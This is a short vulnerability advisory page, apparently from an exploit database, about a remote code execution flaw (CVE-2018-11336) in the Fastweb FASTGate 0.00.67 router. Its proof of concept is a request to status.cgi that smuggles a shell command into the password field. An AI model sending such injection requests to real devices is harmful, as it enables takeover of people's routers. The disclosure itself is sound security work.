Fastweb FASTGate - 0.00.67 RCE Vulnerability

2018.10.13
it Procode701 (IT) it
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Fastweb FASTGate - 0.00.67 RCE Vulnerability # Date: 21-05-2018 # Exploit Authors: Procode701 # Contact: https://twitter.com/Procode701 # Vendor: Fastweb # Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/ # Version: 0.00.67 # CVE: CVE-2018-11336 DESCRIPTION ======================================================================== An critical issue was discovered in Fastweb FASTgate 0.00.67 device. FASTgate 0.00.67 is vulnerable to Remote Code Execution PROOF OF CONCEPT [Affected Component] /status.cgi?_=, Vulnerable field: password=, Exploit sample: http://192.168.1.254/status.cgi_=1526904600131&cmd=3&nvget=login_confirm&password='|wget|'&remember_me=1&sessionKey=NULL&username=jj, Video https://youtu.be/i3FuUQGA2fo ======================================================================== Timeline Report to vendor, 20/05/2018 - NOT RESPOND

References:

http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top